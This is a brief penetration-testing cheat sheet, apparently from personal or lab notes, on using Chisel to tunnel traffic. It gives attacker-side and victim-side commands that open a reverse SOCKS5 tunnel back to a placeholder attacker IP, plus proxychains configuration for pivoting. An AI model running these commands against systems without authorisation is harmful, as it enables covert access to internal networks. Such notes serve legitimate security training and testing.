Chisel (HTTP Tunnelling)
- On attacker, ./chisel server -p 3477 --socks5 --reverse
- On victim, Transfer chisel.exe on window, .\chisel.exe client <attacker-ip>:3477 R:5000:socks
- Configure proxychain4.conf , socks5 127.0.01 5000
- proxychains -q <tool>
Reference:
https://medium.com/geekculture/chisel-network-tunneling-on-steroids-a28e6273c683
Download https://github.com/jpillora/chisel/releases/tag/v1.7.3